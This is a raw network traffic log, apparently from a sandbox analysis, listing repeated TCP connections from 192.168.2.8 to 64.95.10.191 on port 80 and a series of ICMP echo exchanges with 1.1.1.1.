Apr 23, 2024 17:47:04.607112885 CEST4971780192.168.2.864.95.10.191
Apr 23, 2024 17:47:04.727736950 CEST804971664.95.10.191192.168.2.8
Apr 23, 2024 17:47:04.729944944 CEST804971764.95.10.191192.168.2.8
Apr 23, 2024 17:47:04.730037928 CEST4971780192.168.2.864.95.10.191
Apr 23, 2024 17:47:04.730249882 CEST4971780192.168.2.864.95.10.191
Apr 23, 2024 17:47:04.853286028 CEST804971764.95.10.191192.168.2.8
Apr 23, 2024 17:47:04.882106066 CEST804971764.95.10.191192.168.2.8
Apr 23, 2024 17:47:04.924729109 CEST4971780192.168.2.864.95.10.191
Apr 23, 2024 17:47:09.883382082 CEST804971764.95.10.191192.168.2.8
Apr 23, 2024 17:47:09.883600950 CEST4971780192.168.2.864.95.10.191
Apr 23, 2024 17:47:11.315285921 CEST4971780192.168.2.864.95.10.191
Apr 23, 2024 17:47:11.315689087 CEST4971880192.168.2.864.95.10.191
Apr 23, 2024 17:47:11.436265945 CEST804971864.95.10.191192.168.2.8
Apr 23, 2024 17:47:11.436419010 CEST4971880192.168.2.864.95.10.191
Apr 23, 2024 17:47:11.436594009 CEST4971880192.168.2.864.95.10.191
Apr 23, 2024 17:47:11.437907934 CEST804971764.95.10.191192.168.2.8
Apr 23, 2024 17:47:11.557171106 CEST804971864.95.10.191192.168.2.8
Apr 23, 2024 17:47:11.587183952 CEST804971864.95.10.191192.168.2.8
Apr 23, 2024 17:47:11.627933025 CEST4971880192.168.2.864.95.10.191
Apr 23, 2024 17:47:16.588563919 CEST804971864.95.10.191192.168.2.8
Apr 23, 2024 17:47:16.592669010 CEST4971880192.168.2.864.95.10.191
Apr 23, 2024 17:47:18.180264950 CEST4971880192.168.2.864.95.10.191
Apr 23, 2024 17:47:18.180565119 CEST4971980192.168.2.864.95.10.191
Apr 23, 2024 17:47:18.301023006 CEST804971864.95.10.191192.168.2.8
Apr 23, 2024 17:47:18.303177118 CEST804971964.95.10.191192.168.2.8
Apr 23, 2024 17:47:18.303375959 CEST4971980192.168.2.864.95.10.191
Apr 23, 2024 17:47:18.303435087 CEST4971980192.168.2.864.95.10.191
Apr 23, 2024 17:47:18.426213026 CEST804971964.95.10.191192.168.2.8
Apr 23, 2024 17:47:18.454626083 CEST804971964.95.10.191192.168.2.8
Apr 23, 2024 17:47:18.502893925 CEST4971980192.168.2.864.95.10.191
Apr 23, 2024 17:47:23.455672026 CEST804971964.95.10.191192.168.2.8
Apr 23, 2024 17:47:23.455847025 CEST4971980192.168.2.864.95.10.191
Apr 23, 2024 17:47:24.959645987 CEST4971980192.168.2.864.95.10.191
Apr 23, 2024 17:47:24.959955931 CEST4972080192.168.2.864.95.10.191
Apr 23, 2024 17:47:25.082212925 CEST804971964.95.10.191192.168.2.8
Apr 23, 2024 17:47:25.082416058 CEST804972064.95.10.191192.168.2.8
Apr 23, 2024 17:47:25.086023092 CEST4972080192.168.2.864.95.10.191
Apr 23, 2024 17:47:25.089874029 CEST4972080192.168.2.864.95.10.191
Apr 23, 2024 17:47:25.212641954 CEST804972064.95.10.191192.168.2.8
Apr 23, 2024 17:47:25.247689962 CEST804972064.95.10.191192.168.2.8
Apr 23, 2024 17:47:25.299832106 CEST4972080192.168.2.864.95.10.191
Apr 23, 2024 17:47:30.250042915 CEST804972064.95.10.191192.168.2.8
Apr 23, 2024 17:47:30.250109911 CEST4972080192.168.2.864.95.10.191
Apr 23, 2024 17:47:31.818748951 CEST4972080192.168.2.864.95.10.191
Apr 23, 2024 17:47:31.818754911 CEST4972180192.168.2.864.95.10.191
Apr 23, 2024 17:47:31.939590931 CEST804972164.95.10.191192.168.2.8
Apr 23, 2024 17:47:31.939913034 CEST4972180192.168.2.864.95.10.191
Apr 23, 2024 17:47:31.939913034 CEST4972180192.168.2.864.95.10.191
Apr 23, 2024 17:47:31.941392899 CEST804972064.95.10.191192.168.2.8
Apr 23, 2024 17:47:32.060924053 CEST804972164.95.10.191192.168.2.8
Apr 23, 2024 17:47:32.104724884 CEST804972164.95.10.191192.168.2.8
Apr 23, 2024 17:47:32.159244061 CEST4972180192.168.2.864.95.10.191
Apr 23, 2024 17:47:37.115452051 CEST804972164.95.10.191192.168.2.8
Apr 23, 2024 17:47:37.115535975 CEST4972180192.168.2.864.95.10.191
Apr 23, 2024 17:47:38.580511093 CEST4972180192.168.2.864.95.10.191
Apr 23, 2024 17:47:38.580924988 CEST4972280192.168.2.864.95.10.191
Apr 23, 2024 17:47:38.701186895 CEST804972164.95.10.191192.168.2.8
Apr 23, 2024 17:47:38.703551054 CEST804972264.95.10.191192.168.2.8
Apr 23, 2024 17:47:38.703614950 CEST4972280192.168.2.864.95.10.191
Apr 23, 2024 17:47:38.703762054 CEST4972280192.168.2.864.95.10.191
Apr 23, 2024 17:47:38.826334000 CEST804972264.95.10.191192.168.2.8
Apr 23, 2024 17:47:38.855947018 CEST804972264.95.10.191192.168.2.8
Apr 23, 2024 17:47:38.909107924 CEST4972280192.168.2.864.95.10.191
Apr 23, 2024 17:47:43.857353926 CEST804972264.95.10.191192.168.2.8
Apr 23, 2024 17:47:43.857470989 CEST4972280192.168.2.864.95.10.191
Apr 23, 2024 17:47:45.661483049 CEST4972380192.168.2.864.95.10.191
Apr 23, 2024 17:47:45.661541939 CEST4972280192.168.2.864.95.10.191
Apr 23, 2024 17:47:45.782252073 CEST804972364.95.10.191192.168.2.8
Apr 23, 2024 17:47:45.782449961 CEST4972380192.168.2.864.95.10.191
Apr 23, 2024 17:47:45.782639027 CEST4972380192.168.2.864.95.10.191
Apr 23, 2024 17:47:45.784353018 CEST804972264.95.10.191192.168.2.8
Apr 23, 2024 17:47:45.905050993 CEST804972364.95.10.191192.168.2.8
Apr 23, 2024 17:47:45.941970110 CEST804972364.95.10.191192.168.2.8
Apr 23, 2024 17:47:45.987234116 CEST4972380192.168.2.864.95.10.191
Apr 23, 2024 17:47:50.945195913 CEST804972364.95.10.191192.168.2.8
Apr 23, 2024 17:47:50.948613882 CEST4972380192.168.2.864.95.10.191
Apr 23, 2024 17:47:53.093627930 CEST4972380192.168.2.864.95.10.191
Apr 23, 2024 17:47:53.093944073 CEST4972480192.168.2.864.95.10.191
Apr 23, 2024 17:47:53.214338064 CEST804972364.95.10.191192.168.2.8
Apr 23, 2024 17:47:53.214622021 CEST804972464.95.10.191192.168.2.8
Apr 23, 2024 17:47:53.214693069 CEST4972480192.168.2.864.95.10.191
Apr 23, 2024 17:47:53.214828968 CEST4972480192.168.2.864.95.10.191
Apr 23, 2024 17:47:53.335556984 CEST804972464.95.10.191192.168.2.8
Apr 23, 2024 17:47:53.370430946 CEST804972464.95.10.191192.168.2.8
Apr 23, 2024 17:47:53.549767017 CEST4972480192.168.2.864.95.10.191
Apr 23, 2024 17:47:58.371764898 CEST804972464.95.10.191192.168.2.8
Apr 23, 2024 17:47:58.371880054 CEST4972480192.168.2.864.95.10.191
Apr 23, 2024 17:47:59.714193106 CEST4972480192.168.2.864.95.10.191
Apr 23, 2024 17:47:59.714221001 CEST4972580192.168.2.864.95.10.191
Apr 23, 2024 17:47:59.834794998 CEST804972464.95.10.191192.168.2.8
Apr 23, 2024 17:47:59.837074995 CEST804972564.95.10.191192.168.2.8
Apr 23, 2024 17:47:59.837291002 CEST4972580192.168.2.864.95.10.191
Apr 23, 2024 17:47:59.837481976 CEST4972580192.168.2.864.95.10.191
Apr 23, 2024 17:47:59.960145950 CEST804972564.95.10.191192.168.2.8
Apr 23, 2024 17:48:00.011498928 CEST804972564.95.10.191192.168.2.8
Apr 23, 2024 17:48:00.160603046 CEST4972580192.168.2.864.95.10.191
Apr 23, 2024 17:48:05.012751102 CEST804972564.95.10.191192.168.2.8
Apr 23, 2024 17:48:05.012829065 CEST4972580192.168.2.864.95.10.191
Apr 23, 2024 17:48:06.387557983 CEST4972580192.168.2.864.95.10.191
Apr 23, 2024 17:48:06.390619993 CEST4972680192.168.2.864.95.10.191
Apr 23, 2024 17:48:06.510541916 CEST804972564.95.10.191192.168.2.8
Apr 23, 2024 17:48:06.511338949 CEST804972664.95.10.191192.168.2.8
Apr 23, 2024 17:48:06.511406898 CEST4972680192.168.2.864.95.10.191
Apr 23, 2024 17:48:06.511492968 CEST4972680192.168.2.864.95.10.191
Apr 23, 2024 17:48:06.632129908 CEST804972664.95.10.191192.168.2.8
Apr 23, 2024 17:48:06.648271084 CEST804972664.95.10.191192.168.2.8
Apr 23, 2024 17:48:06.794874907 CEST4972680192.168.2.864.95.10.191
Apr 23, 2024 17:48:11.649986982 CEST804972664.95.10.191192.168.2.8
Apr 23, 2024 17:48:11.650257111 CEST4972680192.168.2.864.95.10.191
Apr 23, 2024 17:48:12.997499943 CEST4972680192.168.2.864.95.10.191
Apr 23, 2024 17:48:12.997865915 CEST4972780192.168.2.864.95.10.191
Apr 23, 2024 17:48:13.118716955 CEST804972664.95.10.191192.168.2.8
Apr 23, 2024 17:48:13.120675087 CEST804972764.95.10.191192.168.2.8
Apr 23, 2024 17:48:13.120871067 CEST4972780192.168.2.864.95.10.191
Apr 23, 2024 17:48:13.120996952 CEST4972780192.168.2.864.95.10.191
Apr 23, 2024 17:48:13.243695021 CEST804972764.95.10.191192.168.2.8
Apr 23, 2024 17:48:13.287854910 CEST804972764.95.10.191192.168.2.8
Apr 23, 2024 17:48:13.331016064 CEST4972780192.168.2.864.95.10.191
Apr 23, 2024 17:48:18.290679932 CEST804972764.95.10.191192.168.2.8
Apr 23, 2024 17:48:18.292691946 CEST4972780192.168.2.864.95.10.191
Apr 23, 2024 17:48:19.651727915 CEST4972780192.168.2.864.95.10.191
Apr 23, 2024 17:48:19.652124882 CEST4972880192.168.2.864.95.10.191
Apr 23, 2024 17:48:19.773123980 CEST804972864.95.10.191192.168.2.8
Apr 23, 2024 17:48:19.773463011 CEST4972880192.168.2.864.95.10.191
Apr 23, 2024 17:48:19.773616076 CEST4972880192.168.2.864.95.10.191
Apr 23, 2024 17:48:19.774554014 CEST804972764.95.10.191192.168.2.8
Apr 23, 2024 17:48:19.894464016 CEST804972864.95.10.191192.168.2.8
Apr 23, 2024 17:48:19.925986052 CEST804972864.95.10.191192.168.2.8
Apr 23, 2024 17:48:20.049763918 CEST4972880192.168.2.864.95.10.191
Apr 23, 2024 17:48:24.927378893 CEST804972864.95.10.191192.168.2.8
Apr 23, 2024 17:48:24.927464962 CEST4972880192.168.2.864.95.10.191
Apr 23, 2024 17:48:26.673002958 CEST4972880192.168.2.864.95.10.191
Apr 23, 2024 17:48:26.673517942 CEST4972980192.168.2.864.95.10.191
Apr 23, 2024 17:48:26.793756962 CEST804972864.95.10.191192.168.2.8
Apr 23, 2024 17:48:26.795003891 CEST804972964.95.10.191192.168.2.8
Apr 23, 2024 17:48:26.795108080 CEST4972980192.168.2.864.95.10.191
Apr 23, 2024 17:48:26.795236111 CEST4972980192.168.2.864.95.10.191
Apr 23, 2024 17:48:26.915956974 CEST804972964.95.10.191192.168.2.8
Apr 23, 2024 17:48:26.946841002 CEST804972964.95.10.191192.168.2.8
Apr 23, 2024 17:48:26.987273932 CEST4972980192.168.2.864.95.10.191
Apr 23, 2024 17:48:31.948939085 CEST804972964.95.10.191192.168.2.8
Apr 23, 2024 17:48:31.952672005 CEST4972980192.168.2.864.95.10.191
Apr 23, 2024 17:48:33.307749987 CEST4972980192.168.2.864.95.10.191
Apr 23, 2024 17:48:33.308079004 CEST4973080192.168.2.864.95.10.191
Apr 23, 2024 17:48:33.428522110 CEST804972964.95.10.191192.168.2.8
Apr 23, 2024 17:48:33.428565025 CEST804973064.95.10.191192.168.2.8
Apr 23, 2024 17:48:33.428642035 CEST4973080192.168.2.864.95.10.191
Apr 23, 2024 17:48:33.428757906 CEST4973080192.168.2.864.95.10.191
Apr 23, 2024 17:48:33.549280882 CEST804973064.95.10.191192.168.2.8
Apr 23, 2024 17:48:33.596144915 CEST804973064.95.10.191192.168.2.8
Apr 23, 2024 17:48:33.643508911 CEST4973080192.168.2.864.95.10.191
Apr 23, 2024 17:48:38.596987009 CEST804973064.95.10.191192.168.2.8
Apr 23, 2024 17:48:38.597059965 CEST4973080192.168.2.864.95.10.191
Apr 23, 2024 17:48:39.949455023 CEST4973180192.168.2.864.95.10.191
Apr 23, 2024 17:48:39.949461937 CEST4973080192.168.2.864.95.10.191
Apr 23, 2024 17:48:40.072505951 CEST804973064.95.10.191192.168.2.8
Apr 23, 2024 17:48:40.073379040 CEST804973164.95.10.191192.168.2.8
Apr 23, 2024 17:48:40.073482990 CEST4973180192.168.2.864.95.10.191
Apr 23, 2024 17:48:40.073586941 CEST4973180192.168.2.864.95.10.191
Apr 23, 2024 17:48:40.196504116 CEST804973164.95.10.191192.168.2.8
Apr 23, 2024 17:48:40.236777067 CEST804973164.95.10.191192.168.2.8
Apr 23, 2024 17:48:40.362468958 CEST4973180192.168.2.864.95.10.191
Apr 23, 2024 17:48:45.238313913 CEST804973164.95.10.191192.168.2.8
Apr 23, 2024 17:48:45.238370895 CEST4973180192.168.2.864.95.10.191
Apr 23, 2024 17:48:46.589481115 CEST4973180192.168.2.864.95.10.191
Apr 23, 2024 17:48:46.589876890 CEST4973280192.168.2.864.95.10.191
Apr 23, 2024 17:48:46.710621119 CEST804973264.95.10.191192.168.2.8
Apr 23, 2024 17:48:46.710731983 CEST4973280192.168.2.864.95.10.191
Apr 23, 2024 17:48:46.710803986 CEST4973280192.168.2.864.95.10.191
Apr 23, 2024 17:48:46.712287903 CEST804973164.95.10.191192.168.2.8
Apr 23, 2024 17:48:46.831600904 CEST804973264.95.10.191192.168.2.8
Apr 23, 2024 17:48:46.852080107 CEST804973264.95.10.191192.168.2.8
Apr 23, 2024 17:48:47.024602890 CEST4973280192.168.2.864.95.10.191
Apr 23, 2024 17:48:51.854065895 CEST804973264.95.10.191192.168.2.8
Apr 23, 2024 17:48:51.856798887 CEST4973280192.168.2.864.95.10.191
Apr 23, 2024 17:48:53.216505051 CEST4973280192.168.2.864.95.10.191
Apr 23, 2024 17:48:53.216849089 CEST4973380192.168.2.864.95.10.191
Apr 23, 2024 17:48:53.337281942 CEST804973264.95.10.191192.168.2.8
Apr 23, 2024 17:48:53.337529898 CEST804973364.95.10.191192.168.2.8
Apr 23, 2024 17:48:53.337620020 CEST4973380192.168.2.864.95.10.191
Apr 23, 2024 17:48:53.337820053 CEST4973380192.168.2.864.95.10.191
Apr 23, 2024 17:48:53.458287001 CEST804973364.95.10.191192.168.2.8
Apr 23, 2024 17:48:53.498783112 CEST804973364.95.10.191192.168.2.8
Apr 23, 2024 17:48:53.549771070 CEST4973380192.168.2.864.95.10.191
Apr 23, 2024 17:48:58.500516891 CEST804973364.95.10.191192.168.2.8
Apr 23, 2024 17:48:58.500732899 CEST4973380192.168.2.864.95.10.191
Apr 23, 2024 17:48:59.862675905 CEST4973480192.168.2.864.95.10.191
Apr 23, 2024 17:48:59.862683058 CEST4973380192.168.2.864.95.10.191
Apr 23, 2024 17:48:59.983159065 CEST804973464.95.10.191192.168.2.8
Apr 23, 2024 17:48:59.983267069 CEST804973364.95.10.191192.168.2.8
Apr 23, 2024 17:48:59.984715939 CEST4973480192.168.2.864.95.10.191
Apr 23, 2024 17:48:59.984797001 CEST4973480192.168.2.864.95.10.191
Apr 23, 2024 17:49:00.105436087 CEST804973464.95.10.191192.168.2.8
Apr 23, 2024 17:49:00.158278942 CEST804973464.95.10.191192.168.2.8
Apr 23, 2024 17:49:00.206053972 CEST4973480192.168.2.864.95.10.191
Apr 23, 2024 17:49:05.159981012 CEST804973464.95.10.191192.168.2.8
Apr 23, 2024 17:49:05.160039902 CEST4973480192.168.2.864.95.10.191
Apr 23, 2024 17:49:06.530396938 CEST4973480192.168.2.864.95.10.191
Apr 23, 2024 17:49:06.530401945 CEST4973580192.168.2.864.95.10.191
Apr 23, 2024 17:49:06.651160955 CEST804973564.95.10.191192.168.2.8
Apr 23, 2024 17:49:06.651180983 CEST804973464.95.10.191192.168.2.8
Apr 23, 2024 17:49:06.651259899 CEST4973580192.168.2.864.95.10.191
Apr 23, 2024 17:49:06.651416063 CEST4973580192.168.2.864.95.10.191
Apr 23, 2024 17:49:06.772016048 CEST804973564.95.10.191192.168.2.8
Apr 23, 2024 17:49:06.804924011 CEST804973564.95.10.191192.168.2.8
Apr 23, 2024 17:49:06.846769094 CEST4973580192.168.2.864.95.10.191
Apr 23, 2024 17:49:11.814337969 CEST804973564.95.10.191192.168.2.8
Apr 23, 2024 17:49:11.814474106 CEST4973580192.168.2.864.95.10.191
Apr 23, 2024 17:49:14.400494099 CEST4973580192.168.2.864.95.10.191
Apr 23, 2024 17:49:14.400852919 CEST4973680192.168.2.864.95.10.191
Apr 23, 2024 17:49:14.521013021 CEST804973564.95.10.191192.168.2.8
Apr 23, 2024 17:49:14.521272898 CEST804973664.95.10.191192.168.2.8
Apr 23, 2024 17:49:14.521358967 CEST4973680192.168.2.864.95.10.191
Apr 23, 2024 17:49:14.521461010 CEST4973680192.168.2.864.95.10.191
Apr 23, 2024 17:49:14.642054081 CEST804973664.95.10.191192.168.2.8
Apr 23, 2024 17:49:14.674582958 CEST804973664.95.10.191192.168.2.8
Apr 23, 2024 17:49:14.879611015 CEST4973680192.168.2.864.95.10.191
Apr 23, 2024 17:49:19.687155008 CEST804973664.95.10.191192.168.2.8
Apr 23, 2024 17:49:19.687413931 CEST4973680192.168.2.864.95.10.191
Apr 23, 2024 17:49:21.024645090 CEST4973680192.168.2.864.95.10.191
Apr 23, 2024 17:49:21.027017117 CEST4973780192.168.2.864.95.10.191
Apr 23, 2024 17:49:21.145354033 CEST804973664.95.10.191192.168.2.8
Apr 23, 2024 17:49:21.150023937 CEST804973764.95.10.191192.168.2.8
Apr 23, 2024 17:49:21.150325060 CEST4973780192.168.2.864.95.10.191
Apr 23, 2024 17:49:21.150325060 CEST4973780192.168.2.864.95.10.191
Apr 23, 2024 17:49:21.273394108 CEST804973764.95.10.191192.168.2.8
Apr 23, 2024 17:49:21.315376043 CEST804973764.95.10.191192.168.2.8
Apr 23, 2024 17:49:21.400710106 CEST4973780192.168.2.864.95.10.191
Apr 23, 2024 17:49:26.316610098 CEST804973764.95.10.191192.168.2.8
Apr 23, 2024 17:49:26.316682100 CEST4973780192.168.2.864.95.10.191
Apr 23, 2024 17:49:27.683974981 CEST4973780192.168.2.864.95.10.191
Apr 23, 2024 17:49:27.684319973 CEST4973880192.168.2.864.95.10.191
Apr 23, 2024 17:49:27.805402040 CEST804973864.95.10.191192.168.2.8
Apr 23, 2024 17:49:27.805490017 CEST4973880192.168.2.864.95.10.191
Apr 23, 2024 17:49:27.805634022 CEST4973880192.168.2.864.95.10.191
Apr 23, 2024 17:49:27.806961060 CEST804973764.95.10.191192.168.2.8
Apr 23, 2024 17:49:27.926158905 CEST804973864.95.10.191192.168.2.8
Apr 23, 2024 17:49:27.969048023 CEST804973864.95.10.191192.168.2.8
Apr 23, 2024 17:49:28.049798965 CEST4973880192.168.2.864.95.10.191
Apr 23, 2024 17:49:32.971385002 CEST804973864.95.10.191192.168.2.8
Apr 23, 2024 17:49:32.971544027 CEST4973880192.168.2.864.95.10.191
Apr 23, 2024 17:49:34.323210955 CEST4973880192.168.2.864.95.10.191
Apr 23, 2024 17:49:34.323776007 CEST4973980192.168.2.864.95.10.191
Apr 23, 2024 17:49:34.443806887 CEST804973864.95.10.191192.168.2.8
Apr 23, 2024 17:49:34.446443081 CEST804973964.95.10.191192.168.2.8
Apr 23, 2024 17:49:34.446537018 CEST4973980192.168.2.864.95.10.191
Apr 23, 2024 17:49:34.446687937 CEST4973980192.168.2.864.95.10.191
Apr 23, 2024 17:49:34.569428921 CEST804973964.95.10.191192.168.2.8
Apr 23, 2024 17:49:34.599997044 CEST804973964.95.10.191192.168.2.8
Apr 23, 2024 17:49:34.643557072 CEST4973980192.168.2.864.95.10.191
Apr 23, 2024 17:49:39.600831985 CEST804973964.95.10.191192.168.2.8
Apr 23, 2024 17:49:39.604665995 CEST4973980192.168.2.864.95.10.191
Apr 23, 2024 17:49:40.949455976 CEST4973980192.168.2.864.95.10.191
Apr 23, 2024 17:49:40.952615976 CEST4974080192.168.2.864.95.10.191
Apr 23, 2024 17:49:41.072310925 CEST804973964.95.10.191192.168.2.8
Apr 23, 2024 17:49:41.075474024 CEST804974064.95.10.191192.168.2.8
Apr 23, 2024 17:49:41.076669931 CEST4974080192.168.2.864.95.10.191
Apr 23, 2024 17:49:41.076807976 CEST4974080192.168.2.864.95.10.191
Apr 23, 2024 17:49:41.199544907 CEST804974064.95.10.191192.168.2.8
Apr 23, 2024 17:49:41.220993042 CEST804974064.95.10.191192.168.2.8
Apr 23, 2024 17:49:41.268547058 CEST4974080192.168.2.864.95.10.191
Apr 23, 2024 17:49:46.234860897 CEST804974064.95.10.191192.168.2.8
Apr 23, 2024 17:49:46.235158920 CEST4974080192.168.2.864.95.10.191
Apr 23, 2024 17:49:48.666146994 CEST4974080192.168.2.864.95.10.191
Apr 23, 2024 17:49:48.668608904 CEST4974180192.168.2.864.95.10.191
Apr 23, 2024 17:49:48.789025068 CEST804974064.95.10.191192.168.2.8
Apr 23, 2024 17:49:48.789056063 CEST804974164.95.10.191192.168.2.8
Apr 23, 2024 17:49:48.789138079 CEST4974180192.168.2.864.95.10.191
Apr 23, 2024 17:49:48.789330959 CEST4974180192.168.2.864.95.10.191
Apr 23, 2024 17:49:48.909863949 CEST804974164.95.10.191192.168.2.8
Apr 23, 2024 17:49:48.952688932 CEST804974164.95.10.191192.168.2.8
Apr 23, 2024 17:49:49.049808979 CEST4974180192.168.2.864.95.10.191
Apr 23, 2024 17:49:53.954410076 CEST804974164.95.10.191192.168.2.8
Apr 23, 2024 17:49:53.956634998 CEST4974180192.168.2.864.95.10.191
Apr 23, 2024 17:49:55.308617115 CEST4974180192.168.2.864.95.10.191
Apr 23, 2024 17:49:55.309063911 CEST4974280192.168.2.864.95.10.191
Apr 23, 2024 17:49:55.429193974 CEST804974164.95.10.191192.168.2.8
Apr 23, 2024 17:49:55.431698084 CEST804974264.95.10.191192.168.2.8
Apr 23, 2024 17:49:55.431762934 CEST4974280192.168.2.864.95.10.191
Apr 23, 2024 17:49:55.431893110 CEST4974280192.168.2.864.95.10.191
Apr 23, 2024 17:49:55.554476023 CEST804974264.95.10.191192.168.2.8
Apr 23, 2024 17:49:55.581832886 CEST804974264.95.10.191192.168.2.8
Apr 23, 2024 17:49:55.752953053 CEST4974280192.168.2.864.95.10.191
Apr 23, 2024 17:50:00.583353043 CEST804974264.95.10.191192.168.2.8
Apr 23, 2024 17:50:00.588330030 CEST4974280192.168.2.864.95.10.191
Apr 23, 2024 17:50:02.922282934 CEST4974380192.168.2.864.95.10.191
Apr 23, 2024 17:50:02.922355890 CEST4974280192.168.2.864.95.10.191
Apr 23, 2024 17:50:03.043056011 CEST804974364.95.10.191192.168.2.8
Apr 23, 2024 17:50:03.043205976 CEST4974380192.168.2.864.95.10.191
Apr 23, 2024 17:50:03.043348074 CEST4974380192.168.2.864.95.10.191
Apr 23, 2024 17:50:03.044945955 CEST804974264.95.10.191192.168.2.8
Apr 23, 2024 17:50:03.163923979 CEST804974364.95.10.191192.168.2.8
Apr 23, 2024 17:50:03.192934990 CEST804974364.95.10.191192.168.2.8
Apr 23, 2024 17:50:03.238598108 CEST4974380192.168.2.864.95.10.191
Apr 23, 2024 17:50:08.195636988 CEST804974364.95.10.191192.168.2.8
Apr 23, 2024 17:50:08.195729971 CEST4974380192.168.2.864.95.10.191
Apr 23, 2024 17:50:09.547132015 CEST4974380192.168.2.864.95.10.191
Apr 23, 2024 17:50:09.547501087 CEST4974480192.168.2.864.95.10.191
Apr 23, 2024 17:50:09.667710066 CEST804974364.95.10.191192.168.2.8
Apr 23, 2024 17:50:09.667864084 CEST804974464.95.10.191192.168.2.8
Apr 23, 2024 17:50:09.667917967 CEST4974480192.168.2.864.95.10.191
Apr 23, 2024 17:50:10.550611973 CEST4974480192.168.2.864.95.10.191
Apr 23, 2024 17:50:10.671267033 CEST804974464.95.10.191192.168.2.8
Apr 23, 2024 17:50:10.671467066 CEST4974480192.168.2.864.95.10.191
Apr 23, 2024 17:50:10.671659946 CEST4974480192.168.2.864.95.10.191
Apr 23, 2024 17:50:10.792455912 CEST804974464.95.10.191192.168.2.8
Apr 23, 2024 17:50:10.847649097 CEST804974464.95.10.191192.168.2.8
Apr 23, 2024 17:50:10.893577099 CEST4974480192.168.2.864.95.10.191
Apr 23, 2024 17:50:15.848557949 CEST804974464.95.10.191192.168.2.8
Apr 23, 2024 17:50:15.848642111 CEST4974480192.168.2.864.95.10.191
Apr 23, 2024 17:50:17.184281111 CEST4974480192.168.2.864.95.10.191
Apr 23, 2024 17:50:17.184571981 CEST4974580192.168.2.864.95.10.191
Apr 23, 2024 17:50:17.305133104 CEST804974464.95.10.191192.168.2.8
Apr 23, 2024 17:50:17.307113886 CEST804974564.95.10.191192.168.2.8
Apr 23, 2024 17:50:17.307189941 CEST4974580192.168.2.864.95.10.191
Apr 23, 2024 17:50:18.190910101 CEST4974580192.168.2.864.95.10.191
Apr 23, 2024 17:50:18.313976049 CEST804974564.95.10.191192.168.2.8
Apr 23, 2024 17:50:18.316804886 CEST4974580192.168.2.864.95.10.191
Apr 23, 2024 17:50:18.316936016 CEST4974580192.168.2.864.95.10.191
Apr 23, 2024 17:50:18.439698935 CEST804974564.95.10.191192.168.2.8
Apr 23, 2024 17:50:18.474848986 CEST804974564.95.10.191192.168.2.8
Apr 23, 2024 17:50:18.520716906 CEST4974580192.168.2.864.95.10.191
TimestampSource IPDest IPChecksumCodeType
Apr 23, 2024 17:46:01.398909092 CEST192.168.2.81.1.1.14d5aEcho
Apr 23, 2024 17:46:01.504909039 CEST1.1.1.1192.168.2.8555aEcho Reply
Apr 23, 2024 17:46:02.409158945 CEST192.168.2.81.1.1.14d59Echo
Apr 23, 2024 17:46:02.515957117 CEST1.1.1.1192.168.2.85559Echo Reply
Apr 23, 2024 17:46:03.424907923 CEST192.168.2.81.1.1.14d58Echo
Apr 23, 2024 17:46:03.530906916 CEST1.1.1.1192.168.2.85558Echo Reply
Apr 23, 2024 17:46:04.440931082 CEST192.168.2.81.1.1.14d57Echo
Apr 23, 2024 17:46:04.546736956 CEST1.1.1.1192.168.2.85557Echo Reply
Apr 23, 2024 17:46:04.611920118 CEST192.168.2.81.1.1.14d56Echo
Apr 23, 2024 17:46:04.717755079 CEST1.1.1.1192.168.2.85556Echo Reply
Apr 23, 2024 17:46:05.627993107 CEST192.168.2.81.1.1.14d55Echo
Apr 23, 2024 17:46:05.734482050 CEST1.1.1.1192.168.2.85555Echo Reply
Apr 23, 2024 17:46:06.643627882 CEST192.168.2.81.1.1.14d54Echo
Apr 23, 2024 17:46:06.749593019 CEST1.1.1.1192.168.2.85554Echo Reply
Apr 23, 2024 17:46:07.659240007 CEST192.168.2.81.1.1.14d53Echo
Apr 23, 2024 17:46:07.765312910 CEST1.1.1.1192.168.2.85553Echo Reply
Apr 23, 2024 17:46:08.202975035 CEST192.168.2.81.1.1.14d52Echo
Apr 23, 2024 17:46:08.308820963 CEST1.1.1.1192.168.2.85552Echo Reply
Apr 23, 2024 17:46:09.221909046 CEST192.168.2.81.1.1.14d51Echo
Apr 23, 2024 17:46:09.328058004 CEST1.1.1.1192.168.2.85551Echo Reply
Apr 23, 2024 17:46:10.237374067 CEST192.168.2.81.1.1.14d50Echo
Apr 23, 2024 17:46:10.343274117 CEST1.1.1.1192.168.2.85550Echo Reply
Apr 23, 2024 17:46:11.253021955 CEST192.168.2.81.1.1.14d4fEcho
Apr 23, 2024 17:46:11.359318972 CEST1.1.1.1192.168.2.8554fEcho Reply
Apr 23, 2024 17:46:11.417864084 CEST192.168.2.81.1.1.14d4eEcho
Apr 23, 2024 17:46:11.523866892 CEST1.1.1.1192.168.2.8554eEcho Reply
Apr 23, 2024 17:46:12.424985886 CEST192.168.2.81.1.1.14d4dEcho
Apr 23, 2024 17:46:12.530940056 CEST1.1.1.1192.168.2.8554dEcho Reply
Apr 23, 2024 17:46:14.438216925 CEST192.168.2.81.1.1.14d4cEcho
Apr 23, 2024 17:46:14.544090986 CEST1.1.1.1192.168.2.8554cEcho Reply
Apr 23, 2024 17:46:15.534411907 CEST192.168.2.81.1.1.14d4bEcho
Apr 23, 2024 17:46:15.640332937 CEST1.1.1.1192.168.2.8554bEcho Reply
Apr 23, 2024 17:46:16.021596909 CEST192.168.2.81.1.1.14d4aEcho
Apr 23, 2024 17:46:16.127403021 CEST1.1.1.1192.168.2.8554aEcho Reply
Apr 23, 2024 17:46:17.035020113 CEST192.168.2.81.1.1.14d49Echo
Apr 23, 2024 17:46:17.141803980 CEST1.1.1.1192.168.2.85549Echo Reply
Apr 23, 2024 17:46:18.049957037 CEST192.168.2.81.1.1.14d48Echo
Apr 23, 2024 17:46:18.156054020 CEST1.1.1.1192.168.2.85548Echo Reply
Apr 23, 2024 17:46:19.065478086 CEST192.168.2.81.1.1.14d47Echo
Apr 23, 2024 17:46:19.171494961 CEST1.1.1.1192.168.2.85547Echo Reply
Apr 23, 2024 17:46:19.243367910 CEST192.168.2.81.1.1.14d46Echo
Apr 23, 2024 17:46:19.349483967 CEST1.1.1.1192.168.2.85546Echo Reply
Apr 23, 2024 17:46:20.268919945 CEST192.168.2.81.1.1.14d45Echo
Apr 23, 2024 17:46:20.374923944 CEST1.1.1.1192.168.2.85545Echo Reply
Apr 23, 2024 17:46:21.284365892 CEST192.168.2.81.1.1.14d44Echo
Apr 23, 2024 17:46:21.390288115 CEST1.1.1.1192.168.2.85544Echo Reply
Apr 23, 2024 17:46:22.300729036 CEST192.168.2.81.1.1.14d43Echo
